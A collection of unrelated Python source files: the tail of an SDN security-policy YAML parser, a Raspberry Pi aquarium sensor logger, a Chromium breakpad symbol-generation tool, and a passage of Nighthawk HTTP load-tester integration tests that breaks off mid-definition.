startup-order" #f = open(outputFolder+"\\"+ self.cloudId + "VNF-startup"+".py", 'w') #f.write("#---- Python VM startup for " + self.cloudId + " ---" +"\n") f = open(outputFolder+"//"+ "start-VNF-"+chaining[1][0] +".py", 'w') f.write("#---- Python VM startup for " + chaining[1][0] + " ---" +"\n") f.write("import multiprocessing"+"\n") f.write("import time"+"\n") for chainedVNF in chaining[1]: f.write("import " + chainedVNF + "\n") f.write("\n") f.write("processes = []"+"\n") f.write("\n") f.write("if __name__ == '__main__':"+"\n") for chainedVNF in chaining[1]: f.write("\t"+"p = multiprocessing.Process(target="+chainedVNF+"."+"start"+chainedVNF+")"+"\n") f.write("\t"+"processes.append(p)"+"\n") f.write("\t"+"p.start()"+"\n") f.write("\t"+"print \"started "+ chainedVNF+ "\""+"\n") f.write("\t"+"time.sleep(5)"+"\n") f.write("\n") f.write("\t"+"for p in processes:"+"\n") f.write("\t"+"\t"+"p.join()"+"\n") f.close() elif (clouds[0]=="SecurityGroup"): secItem="" for secItem in clouds[1].items(): #print secItem #for secItem in secGroupStr.items(): if (secItem[0]=="id"): secGroupId= secItem[1] elif (secItem[0]=="members"): secGroupMembers= secItem[1] print "security group:", secGroupId, "members:", secGroupMembers elif (clouds[0]=="AuthorizedProtocols"): chainingstr="" for chaining in clouds[1].items(): for chainedVNF in chaining[1]: if (chainingstr==""): chainingstr=chainedVNF else: chainingstr=chainingstr+" , "+ chainedVNF print "Authorized protocols", ":", chainingstr elif (key=="configuration"): print key, ":", item key=item def readYAMLfileV2(self, fileName): with open(fileName, 'r') as stream: try: yamlObject=yaml.load(stream) #print yamlObject print "load:" print yamlObject.items() print "parse:" #for event in yaml.parse(stream): # print event #yaml.compose(stream) except yaml.YAMLError as exc: print(exc) def verifySecurityPolicy(self, fedSDN): print "network segments for", "FedCloudNetwork_1", "are", fedSDN.getNetworkFederationSegments("FedCloudNetwork_1") network_segments=fedSDN.getNetworkFederationSegments("FedCloudNetwork_1") network_segment="" for network_segment in network_segments: print "VNF for ", network_segment, "are", self.getListOfSecurityVNF_networkSegment(network_segment) print "IncomingChaining for", network_segment, "is", "" print "OutgoingChaining for", network_segment, "is", ""
sensors.py
#!/usr/bin/env python import serial import os import glob import time import RPi.GPIO as GPIO import sqlite3 import threading import subprocess import sys sys.path.append('/opt/rrdtool-1.4.3/lib/python2.7/site-packages/') import rrdtool config = "/data/config.py" from config import * global x x = 0 print "SENSOR PROGRAM STARTED\n" usbport = '/dev/ttyAMA0' # **PH** ser = serial.Serial(usbport, 9600) # **PH** os.system('modprobe w1-gpio') # **TEMP** os.system('modprobe w1-therm') # **TEMP** base_dir = '/sys/bus/w1/devices/' # **TEMP** device_folder = glob.glob(base_dir + '28*')[0] # **TEMP** device_file = device_folder + '/w1_slave' # **TEMP** GPIO.setmode(GPIO.BCM) # **DISTANCE** # turn on the LEDs ser.write("L,1\r") # **PH** ser.write("C,1\r") # **PH** global distance # **DISTANCE* GPIO.setup(GPIO_OUT_sumptrig, GPIO.OUT) # **DISTANCE* GPIO.setup(GPIO_IN_sumpecho, GPIO.IN) # **DISTANCE* global phrrd global temprrd global sumprrd try: hotconn = sqlite3.connect( db_location, check_same_thread=False) print "CONNECTED TO hot.db" except: print "COULD NOT CONNECT TO HOT DATABASE" try: histconn = sqlite3.connect( db_history, check_same_thread=False) print "CONNECTED TO history.db" except: print "COULD NOT CONNECT TO HISTORY DATABASE" def cleanup(): GPIO.cleanup() print "GPIO Cleanup" hotconn.close() print "Database Connection Closed" print "Programing Terminated Successfully" def db_generatetables(): try: cursor_hot = hotconn.cursor() time.sleep(1) cursor_hot.execute(''' CREATE TABLE IF NOT EXISTS tank( id INTEGER PRIMARY KEY, ph TEXT, temp TEXT, sump TEXT) ''') time.sleep(1) hotconn.commit() print "TABLE TANK COMMITTED IN HOT DATABASE" except: print "SHITS FUCKED YO - TABLE TANK FAILED TO COMMIT IN HOT DATABASE" try: # CREATING TOPOFF TABLE cursor_hist = histconn.cursor() time.sleep(1) cursor_hist.execute(''' CREATE TABLE IF NOT EXISTS topoff( id INTEGER PRIMARY KEY, time TEXT, amount TEXT) ''') # CREATING WATERCHANGE TABLE print "TABLE WATERCHANGE COMMITTED IN HOT DATABASE" time.sleep(1) cursor_hist.execute(''' CREATE TABLE IF NOT EXISTS waterchange( id INTEGER PRIMARY KEY, time TEXT, amount TEXT) ''') time.sleep(1) histconn.commit() print "TABLES COMMITTED IN HIST DATABASE" except: print "SHITS FUCKED YO - TABLES IN HIST DB FAILED TO COMMIT" time.sleep(1) db_generatetables() # cleartable() time.sleep(1) cursor_hot = hotconn.cursor() cursor_hot.execute('''INSERT INTO tank(ph, temp, sump) VALUES(?,?,?)''', ("NULL", "NULL", "NULL")) hotconn.commit() time.sleep(1) def distancesump(): global sumprrd noprint = 0 while x < 100: timeoutstart = time.time() timeoutstart = timeoutstart + 5 GPIO.output(GPIO_OUT_sumptrig, False) time.sleep(1) GPIO.output(GPIO_OUT_sumptrig, True) time.sleep(0.00001) GPIO.output(GPIO_OUT_sumptrig, False) while GPIO.input(GPIO_IN_sumpecho) == 0: pulse_start = time.time() if time.time() > timeoutstart: break while GPIO.input(GPIO_IN_sumpecho) == 1: pulse_end = time.time() if time.time() > timeoutstart: noprint = 1 break pulse_duration = pulse_end - pulse_start instantdistance = pulse_duration * 17150 instantdistance = round(instantdistance, 2) distancestring = str(instantdistance) try: if noprint < 1: hotconn.execute( "UPDATE tank SET sump = ? WHERE id = ?", (distancestring, 1)) hotconn.commit() sumprrd = distancestring else: noprint = 0 except: print "\033[1;31mSUMP DISTANCE WRITE SQL ERROR\033[1;0m" return instantdistance def read_temp_raw(): # **TEMP** f = open(device_file, 'r') lines = f.readlines() f.close() return lines def read_temp(): # **TEMP** global temprrd while x < 100: lines = read_temp_raw() while lines[0].strip()[-3:] != 'YES': time.sleep(0.2) lines = read_temp_raw() equals_pos = lines[1].find('t=') if equals_pos != -1: temp_string = lines[1][equals_pos + 2:] temp_c = float(temp_string) / 1000.0 temp_f = temp_c * 9.0 / 5.0 + 32.0 temp_f = round(temp_f, 1) try: temp_f = float(temp_f) temp_f = str(temp_f) hotconn.execute( "UPDATE tank SET temp = ? WHERE id = ?", (temp_f, 1)) hotconn.commit() temprrd = temp_f except: print "\033[1;31mTEMP WRITE SQL ERROR\033[1;0m" time.sleep(1) return temp_f def read_ph(): global phrrd line = "" while x < 100: time.sleep(2) while True: data = ser.read() if(data == "\r"): try: line = float(line) line = str(line) hotconn.execute( "UPDATE tank SET ph = ? WHERE id = ?", (line, 1)) hotconn.commit() phrrd = line except: print "\033[1;31mPH SQL WRITE ERROR\033[1;0m" line = "" break else: line = line + data def rrdwrite(ph, temp, sump): try: ph = float(ph) ph = str(ph) temp = float(temp) temp = str(temp) sump = float(sump) sump = str(sump) ret = rrdtool.update(rrd_db, 'N:%s:%s:%s' % (ph, temp, sump)) time.sleep(.1) subprocess.call( " python /data/database/creategraphs.py", shell=True) if ret: print rrdtool.error() except Exception as inst: print type(inst) print ph + " " + temp + " " + sump def rrdloop(): time.sleep(5) global phrrd global temprrd global sumprrd while True: try: rrdwrite(phrrd, temprrd, sumprrd) time.sleep(10) except: print "RRDLOOP FAILED" time.sleep(10) if __name__ == "__main__": try: print "\033[1;32mMAIN SENSOR PROGRAM STARTING...\033[1;0m" b = threading.Thread(target=distancesump) c = threading.Thread(target=read_temp) d = threading.Thread(target=read_ph) e = threading.Thread(target=rrdloop) b.daemon = True c.daemon = True d.daemon = True e.daemon = True b.start() c.start() d.start() e.start() while x < 100: time.sleep(5) except KeyboardInterrupt: print "\033[1;31mKEYBOARD INTERRUPT DETECTED - SHUTTING DOWN\033[1;0m" cleanup() cursor_hot = hotconn.execute("SELECT id, ph, temp, sump from tank") for row in cursor_hot: print "ID = ", row[0] print "pH = ", row[1] print "Temp = ", row[2] print "Sump = ", row[3], "\n" cleanup()
generate_breakpad_symbols.py
#!/usr/bin/env python # Copyright (c) 2013 GitHub, Inc. # Copyright (c) 2013 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """A tool to generate symbols for a binary suitable for breakpad. Currently, the tool only supports Linux, Android, and Mac. Support for other platforms is planned. """ import errno import optparse import os import Queue import re import shutil import subprocess import sys import threading CONCURRENT_TASKS=4 def GetCommandOutput(command): """Runs the command list, returning its output. Prints the given command (which should be a list of one or more strings), then runs it and returns its output (stdout) as a string. From chromium_utils. """ devnull = open(os.devnull, 'w') proc = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=devnull, bufsize=1) output = proc.communicate()[0] return output def GetDumpSymsBinary(build_dir=None): """Returns the path to the dump_syms binary.""" DUMP_SYMS = 'dump_syms' dump_syms_bin = os.path.join(os.path.expanduser(build_dir), DUMP_SYMS) if not os.access(dump_syms_bin, os.X_OK): print 'Cannot find %s.' % DUMP_SYMS sys.exit(1) return dump_syms_bin def FindBundlePart(full_path): if full_path.endswith(('.dylib', '.framework', '.app')): return os.path.basename(full_path) elif full_path != '' and full_path != '/': return FindBundlePart(os.path.dirname(full_path)) else: return '' def GetDSYMBundle(options, binary_path): """Finds the .dSYM bundle to the binary.""" if os.path.isabs(binary_path): dsym_path = binary_path + '.dSYM' if os.path.exists(dsym_path): return dsym_path filename = FindBundlePart(binary_path) search_dirs = [options.build_dir, options.libchromiumcontent_dir] if filename.endswith(('.dylib', '.framework', '.app')): for directory in search_dirs: dsym_path = os.path.join(directory, filename) + '.dSYM' if os.path.exists(dsym_path): return dsym_path return binary_path def GetSymbolPath(options, binary_path): """Finds the .dbg to the binary.""" filename = os.path.basename(binary_path) dbg_path = os.path.join(options.libchromiumcontent_dir, filename) + '.dbg' if os.path.exists(dbg_path): return dbg_path return binary_path def Resolve(path, exe_path, loader_path, rpaths): """Resolve a dyld path. @executable_path is replaced with |exe_path| @loader_path is replaced with |loader_path| @rpath is replaced with the first path in |rpaths| where the referenced file is found """ path = path.replace('@loader_path', loader_path) path = path.replace('@executable_path', exe_path) if path.find('@rpath') != -1: for rpath in rpaths: new_path = Resolve(path.replace('@rpath', rpath), exe_path, loader_path, []) if os.access(new_path, os.F_OK): return new_path return '' return path def GetSharedLibraryDependenciesLinux(binary): """Return absolute paths to all shared library dependecies of the binary. This implementation assumes that we're running on a Linux system.""" ldd = GetCommandOutput(['ldd', binary]) lib_re = re.compile('\t.* => (.+) \(.*\)$') result = [] for line in ldd.splitlines(): m = lib_re.match(line) if m: result.append(m.group(1)) return result def GetSharedLibraryDependenciesMac(binary, exe_path): """Return absolute paths to all shared library dependecies of the binary. This implementation assumes that we're running on a Mac system.""" loader_path = os.path.dirname(binary) otool = GetCommandOutput(['otool', '-l', binary]).splitlines() rpaths = [] for idx, line in enumerate(otool): if line.find('cmd LC_RPATH') != -1: m = re.match(' *path (.*) \(offset .*\)$', otool[idx+2]) rpaths.append(m.group(1)) otool = GetCommandOutput(['otool', '-L', binary]).splitlines() lib_re = re.compile('\t(.*) \(compatibility .*\)$') deps = [] for line in otool: m = lib_re.match(line) if m: dep = Resolve(m.group(1), exe_path, loader_path, rpaths) if dep: deps.append(os.path.normpath(dep)) return deps def GetSharedLibraryDependencies(options, binary, exe_path): """Return absolute paths to all shared library dependecies of the binary.""" deps = [] if sys.platform.startswith('linux'): deps = GetSharedLibraryDependenciesLinux(binary) elif sys.platform == 'darwin': deps = GetSharedLibraryDependenciesMac(binary, exe_path) else: print "Platform not supported." sys.exit(1) result = [] build_dir = os.path.abspath(options.build_dir) for dep in deps: if (os.access(dep, os.F_OK)): result.append(dep) return result def mkdir_p(path): """Simulates mkdir -p.""" try: os.makedirs(path) except OSError as e: if e.errno == errno.EEXIST and os.path.isdir(path): pass else: raise def GenerateSymbols(options, binaries): """Dumps the symbols of binary and places them in the given directory.""" queue = Queue.Queue() print_lock = threading.Lock() def _Worker(): while True: binary = queue.get() if options.verbose: with print_lock: print "Generating symbols for %s" % binary if sys.platform == 'darwin': binary = GetDSYMBundle(options, binary) elif sys.platform == 'linux2': binary = GetSymbolPath(options, binary) syms = GetCommandOutput([GetDumpSymsBinary(options.build_dir), '-r', '-c', binary]) module_line = re.match("MODULE [^ ]+ [^ ]+ ([0-9A-F]+) (.*)\n", syms) output_path = os.path.join(options.symbols_dir, module_line.group(2), module_line.group(1)) mkdir_p(output_path) symbol_file = "%s.sym" % module_line.group(2) f = open(os.path.join(output_path, symbol_file), 'w') f.write(syms) f.close() queue.task_done() for binary in binaries: queue.put(binary) for _ in range(options.jobs): t = threading.Thread(target=_Worker) t.daemon = True t.start() queue.join() def main(): parser = optparse.OptionParser() parser.add_option('', '--build-dir', default='', help='The build output directory.') parser.add_option('', '--symbols-dir', default='', help='The directory where to write the symbols file.') parser.add_option('', '--libchromiumcontent-dir', default='', help='The directory where libchromiumcontent is downloaded.') parser.add_option('', '--binary', default='', help='The path of the binary to generate symbols for.') parser.add_option('', '--clear', default=False, action='store_true', help='Clear the symbols directory before writing new ' 'symbols.') parser.add_option('-j', '--jobs', default=CONCURRENT_TASKS, action='store', type='int', help='Number of parallel tasks to run.') parser.add_option('-v', '--verbose', action='store_true', help='Print verbose status output.') (options, _) = parser.parse_args() if not options.symbols_dir: print "Required option --symbols-dir missing." return 1 if not options.build_dir: print "Required option --build-dir missing." return 1 if not options.libchromiumcontent_dir: print "Required option --libchromiumcontent-dir missing." return 1 if not options.binary: print "Required option --binary missing." return 1 if not os.access(options.binary, os.X_OK): print "Cannot find %s." % options.binary return 1 if options.clear: try: shutil.rmtree(options.symbols_dir) except: pass # Build the transitive closure of all dependencies. binaries = set([options.binary]) queue = [options.binary] exe_path = os.path.dirname(options.binary) while queue: deps = GetSharedLibraryDependencies(options, queue.pop(0), exe_path) new_deps = set(deps) - binaries binaries |= new_deps queue.extend(list(new_deps)) GenerateSymbols(options, binaries) return 0 if '__main__' == __name__: sys.exit(main())
test_integration_basics.py
"""Tests Nighthawk's basic functionality.""" import json import logging import math import os import pytest import subprocess import sys import time from threading import Thread from test.integration.common import IpVersion from test.integration.integration_test_fixtures import ( http_test_server_fixture, https_test_server_fixture, https_test_server_fixture, multi_http_test_server_fixture, multi_https_test_server_fixture, quic_test_server_fixture, server_config, server_config_quic) from test.integration import asserts from test.integration import utility # TODO(oschaaf): we mostly verify stats observed from the client-side. Add expectations # for the server side as well. @pytest.mark.skipif(utility.isSanitizerRun(), reason="Unstable and very slow in sanitizer runs") def test_http_h1(http_test_server_fixture): """Test http1 over plain http. Runs the CLI configured to use plain HTTP/1 against our test server, and sanity checks statistics from both client and server. """ parsed_json, _ = http_test_server_fixture.runNighthawkClient([ http_test_server_fixture.getTestServerRootUri(), "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24" ]) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 1) asserts.assertCounterEqual(counters, "upstream_cx_rx_bytes_total", 3400) asserts.assertCounterEqual(counters, "upstream_cx_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_tx_bytes_total", 500) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "default.total_match_count", 1) global_histograms = http_test_server_fixture.getNighthawkGlobalHistogramsbyIdFromJson(parsed_json) asserts.assertEqual(int(global_histograms["benchmark_http_client.response_body_size"]["count"]), 25) asserts.assertEqual(int(global_histograms["benchmark_http_client.response_header_size"]["count"]), 25) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_body_size"]["raw_mean"]), 10) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_header_size"]["raw_mean"]), 97) asserts.assertEqual(int(global_histograms["benchmark_http_client.response_body_size"]["raw_min"]), 10) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_header_size"]["raw_min"]), 97) asserts.assertEqual(int(global_histograms["benchmark_http_client.response_body_size"]["raw_max"]), 10) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_header_size"]["raw_max"]), 97) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_body_size"]["raw_pstdev"]), 0) asserts.assertEqual( int(global_histograms["benchmark_http_client.response_header_size"]["raw_pstdev"]), 0) asserts.assertEqual(len(counters), 12) def _mini_stress_test(fixture, args): # run a test with more rps then we can handle, and a very small client-side queue. # we should observe both lots of successfull requests as well as time spend in blocking mode., parsed_json, _ = fixture.runNighthawkClient(args) counters = fixture.getNighthawkCounterMapFromJson(parsed_json) # We set a reasonably low expectation of 100 requests. We set it low, because we want this # test to succeed on a reasonable share of setups (hopefully practically all). MIN_EXPECTED_REQUESTS = 100 asserts.assertCounterEqual(counters, "benchmark.http_2xx", MIN_EXPECTED_REQUESTS) if "--h2" in args: asserts.assertCounterEqual(counters, "upstream_cx_http2_total", 1) else: asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 1) global_histograms = fixture.getNighthawkGlobalHistogramsbyIdFromJson(parsed_json) if "--open-loop" in args: asserts.assertEqual(int(global_histograms["sequencer.blocking"]["count"]), 0) else: asserts.assertGreaterEqual(int(global_histograms["sequencer.blocking"]["count"]), 1) asserts.assertGreaterEqual( int(global_histograms["benchmark_http_client.request_to_response"]["count"]), 1) asserts.assertGreaterEqual(int(global_histograms["benchmark_http_client.latency_2xx"]["count"]), 1) return counters # The mini stress tests below are executing in closed-loop mode. As we guard the pool against # overflows, we can set fixed expectations with respect to overflows and anticipated pending # totals. def test_http_h1_mini_stress_test_with_client_side_queueing(http_test_server_fixture): """Run a max rps test with the h1 pool against our test server, using a small client-side queue.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "999999", "--max-pending-requests", "10", "--connections", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99", "--simple-warmup" ]) asserts.assertCounterGreaterEqual(counters, "upstream_rq_pending_total", 11) asserts.assertCounterGreaterEqual(counters, "upstream_cx_overflow", 10) def test_http_h1_mini_stress_test_without_client_side_queueing(http_test_server_fixture): """Run a max rps test with the h1 pool against our test server, with no client-side queueing.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "999999", "--connections", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99" ]) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertNotIn("upstream_cx_overflow", counters) def test_http_h2_mini_stress_test_with_client_side_queueing(http_test_server_fixture): """Run a max rps test with the h2 pool against our test server, using a small client-side queue.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "999999", "--max-pending-requests", "10", "--h2", "--max-active-requests", "1", "--connections", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99", "--simple-warmup" ]) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_rq_pending_overflow", 10) def test_http_h2_mini_stress_test_without_client_side_queueing(http_test_server_fixture): """Run a max rps test with the h2 pool against our test server, with no client-side queueing.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "999999", "--h2", "--max-active-requests", "1", "--connections", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99" ]) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertNotIn("upstream_rq_pending_overflow", counters) @pytest.mark.skipif(not utility.isRunningInCircleCi(), reason="Has very high failure rate in local executions.") @pytest.mark.skipif(utility.isSanitizerRun(), reason="Unstable and very slow in sanitizer runs") def test_http_h1_mini_stress_test_open_loop(http_test_server_fixture): """Run an H1 open loop stress test. We expect higher pending and overflow counts.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "10000", "--max-pending-requests", "1", "--open-loop", "--max-active-requests", "1", "--connections", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99", "--simple-warmup" ]) # we expect pool overflows asserts.assertCounterGreater(counters, "benchmark.pool_overflow", 10) @pytest.mark.skipif(not utility.isRunningInCircleCi(), reason="Has very high failure rate in local executions.") @pytest.mark.skipif(utility.isSanitizerRun(), reason="Unstable and very slow in sanitizer runs") def test_http_h2_mini_stress_test_open_loop(http_test_server_fixture): """Run an H2 open loop stress test. We expect higher overflow counts.""" counters = _mini_stress_test(http_test_server_fixture, [ http_test_server_fixture.getTestServerRootUri(), "--rps", "10000", "--max-pending-requests", "1", "--h2", "--open-loop", "--max-active-requests", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99", "--simple-warmup" ]) # we expect pool overflows asserts.assertCounterGreater(counters, "benchmark.pool_overflow", 10) def test_http_h2(http_test_server_fixture): """Test h2 over plain http. Runs the CLI configured to use h2c against our test server, and sanity checks statistics from both client and server. """ parsed_json, _ = http_test_server_fixture.runNighthawkClient([ "--h2", http_test_server_fixture.getTestServerRootUri(), "--max-active-requests", "1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24", "--rps", "100" ]) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http2_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_rx_bytes_total", 1030) asserts.assertCounterEqual(counters, "upstream_cx_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_tx_bytes_total", 403) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "default.total_match_count", 1) asserts.assertEqual(len(counters), 12) def test_http_concurrency(http_test_server_fixture): """Test that concurrency acts like a multiplier.""" parsed_json, _ = http_test_server_fixture.runNighthawkClient([ "--concurrency 4 --rps 100 --connections 1", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24", http_test_server_fixture.getTestServerRootUri() ]) counters = http_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) # Quite a loose expectation, but this may fluctuate depending on server load. # Ideally we'd see 4 workers * 5 rps * 5s = 100 requests total asserts.assertCounterEqual(counters, "benchmark.http_2xx", 100) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 4) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h1(https_test_server_fixture): """Test h1 over https. Runs the CLI configured to use HTTP/1 over https against our test server, and sanity checks statistics from both client and server. """ parsed_json, _ = https_test_server_fixture.runNighthawkClient([ https_test_server_fixture.getTestServerRootUri(), "--connections", "1", "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24" ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http1_total", 1) asserts.assertCounterEqual(counters, "upstream_cx_rx_bytes_total", 3400) asserts.assertCounterEqual(counters, "upstream_cx_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_tx_bytes_total", 500) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "ssl.ciphers.ECDHE-RSA-AES128-GCM-SHA256", 1) asserts.assertCounterEqual(counters, "ssl.curves.X25519", 1) asserts.assertCounterEqual(counters, "ssl.handshake", 1) asserts.assertCounterEqual(counters, "ssl.sigalgs.rsa_pss_rsae_sha256", 1) asserts.assertCounterEqual(counters, "ssl.versions.TLSv1.2", 1) asserts.assertCounterEqual(counters, "default.total_match_count", 1) asserts.assertEqual(len(counters), 17) server_stats = https_test_server_fixture.getTestServerStatisticsJson() asserts.assertEqual( https_test_server_fixture.getServerStatFromJson(server_stats, "http.ingress_http.downstream_rq_2xx"), 25) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h2(https_test_server_fixture): """Test http2 over https. Runs the CLI configured to use HTTP/2 (using https) against our test server, and sanity checks statistics from both client and server. """ parsed_json, _ = https_test_server_fixture.runNighthawkClient([ "--h2", https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24", "--max-active-requests", "1" ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http2_total", 1) # Through emperical observation, 1030 has been determined to be the minimum of bytes # we can expect to have received when execution has stopped. asserts.assertCounterGreaterEqual(counters, "upstream_cx_rx_bytes_total", 1030) asserts.assertCounterEqual(counters, "upstream_cx_total", 1) asserts.assertCounterGreaterEqual(counters, "upstream_cx_tx_bytes_total", 403) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "ssl.ciphers.ECDHE-RSA-AES128-GCM-SHA256", 1) asserts.assertCounterEqual(counters, "ssl.curves.X25519", 1) asserts.assertCounterEqual(counters, "ssl.handshake", 1) asserts.assertCounterEqual(counters, "ssl.sigalgs.rsa_pss_rsae_sha256", 1) asserts.assertCounterEqual(counters, "ssl.versions.TLSv1.2", 1) asserts.assertCounterEqual(counters, "default.total_match_count", 1) asserts.assertEqual(len(counters), 17) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h2_multiple_connections(https_test_server_fixture): """Test that the experimental h2 pool uses multiple connections. The burst we send ensures we will need 10 connections right away, as we limit max active streams per connection to 1 by setting the experimental flag to use multiple h2 connections. """ parsed_json, _ = https_test_server_fixture.runNighthawkClient([ "--h2", https_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:99", "--max-active-requests", "10", "--max-pending-requests", "10", "--max-concurrent-streams", "1", "--burst-size", "10" ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterGreaterEqual(counters, "benchmark.http_2xx", 100) # Empirical observation shows we may end up creating more then 10 connections. # This is stock Envoy h/2 pool behavior. asserts.assertCounterGreaterEqual(counters, "upstream_cx_http2_total", 10) def test_h3_quic(quic_test_server_fixture): """Test http3 quic. Runs the CLI configured to use HTTP/3 Quic against our test server, and sanity checks statistics from both client and server. """ parsed_json, _ = quic_test_server_fixture.runNighthawkClient([ "--protocol http3", quic_test_server_fixture.getTestServerRootUri(), "--rps", "100", "--duration", "100", "--termination-predicate", "benchmark.http_2xx:24", "--max-active-requests", "1", # Envoy doesn't support disabling certificate verification on Quic # connections, so the host in our requests has to match the hostname in # the leaf certificate. "--request-header", "Host:www.lyft.com" ]) counters = quic_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterEqual(counters, "benchmark.http_2xx", 25) asserts.assertCounterEqual(counters, "upstream_cx_http3_total", 1) asserts.assertCounterEqual(counters, "upstream_cx_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_pending_total", 1) asserts.assertCounterEqual(counters, "upstream_rq_total", 25) asserts.assertCounterEqual(counters, "default.total_match_count", 1) def _do_tls_configuration_test(https_test_server_fixture, cli_parameter, use_h2): """Test with different ciphers. For a given choice of (--tls-context, --transport-socket) x (H1, H2), run a series of traffic tests with different ciphers. Args: https_test_server_fixture: pytest.fixture that controls a test server and client cli_parameter: string, --tls-context or --transport-socket use_h2: boolean, whether to pass --h2 """ if cli_parameter == "--tls-context": json_template = "{common_tls_context:{tls_params:{cipher_suites:[\"-ALL:%s\"]}}}" else: json_template = "%s%s%s" % ( "{name:\"envoy.transport_sockets.tls\",typed_config:{", "\"@type\":\"type.googleapis.com/envoy.extensions.transport_sockets.tls.v3.UpstreamTlsContext\",", "common_tls_context:{tls_params:{cipher_suites:[\"-ALL:%s\"]}}}}") for cipher in [ "ECDHE-RSA-AES128-SHA", "ECDHE-RSA-CHACHA20-POLY1305", ]: parsed_json, _ = https_test_server_fixture.runNighthawkClient( (["--protocol", "http2"] if use_h2 else []) + [ "--duration", "10", "--termination-predicate", "benchmark.http_2xx:0", cli_parameter, json_template % cipher, https_test_server_fixture.getTestServerRootUri() ]) counters = https_test_server_fixture.getNighthawkCounterMapFromJson(parsed_json) asserts.assertCounterGreaterEqual(counters, "ssl.ciphers.%s" % cipher, 1) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h1_tls_context_configuration(https_test_server_fixture): """Test that specifying tls cipher suites works with the h1 pool.""" _do_tls_configuration_test(https_test_server_fixture, "--tls-context", use_h2=False) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h1_transport_socket_configuration(https_test_server_fixture): """Test that specifying tls cipher suites via transport socket works with the h1 pool.""" _do_tls_configuration_test(https_test_server_fixture, "--transport-socket", use_h2=False) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h2_tls_context_configuration(https_test_server_fixture): """Test that specifying tls cipher suites works with the h2 pool.""" _do_tls_configuration_test(https_test_server_fixture, "--tls-context", use_h2=True) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def test_https_h2_transport_socket_configuration(https_test_server_fixture): """Test that specifying tls cipher suites via transport socket works with the h2 pool.""" _do_tls_configuration_test(https_test_server_fixture, "--transport-socket", use_h2=True) @pytest.mark.parametrize('server_config', ["nighthawk/test/integration/configurations/nighthawk_https_origin.yaml"]) def 